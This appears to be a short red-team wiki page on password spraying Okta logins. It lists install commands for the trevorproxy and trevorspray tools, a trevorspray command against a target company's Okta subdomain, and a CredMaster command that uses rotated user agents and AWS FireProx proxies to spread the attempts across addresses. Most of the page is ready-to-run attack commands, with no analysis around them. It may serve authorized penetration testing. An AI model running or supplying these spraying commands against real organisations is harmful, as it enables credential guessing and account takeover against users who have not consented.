Password spraying Okta is just as easy as password spraying any other service, however, visibility can be difficult at times as Okta does not display if a user has been locked out. For this reason, it is recommended to configure password spray tooling to have longer lockouts, ensuring there are no business disruptions.
# Installation
pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray
# Password Spraying
trevorspray -m okta -u $users -p $password
{% hint style="info" %}
After submitting the above command, TrevorSpray will ask for the subdomain of the company you're targeting $.okta.com
This should have been identified during the reconaissance phase and is often $companyname.okta.com
.
{% endhint %}
# https://github.com/knavesec/CredMaster
python3 credmaster.py --plugin -u $users -p $passwords -a $useragents --config $config
CredMaster requires AWS access keys to setup FireProx, the following guide can be used to configure the appropriate permissions and start spraying:
{% embed url="https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b" %}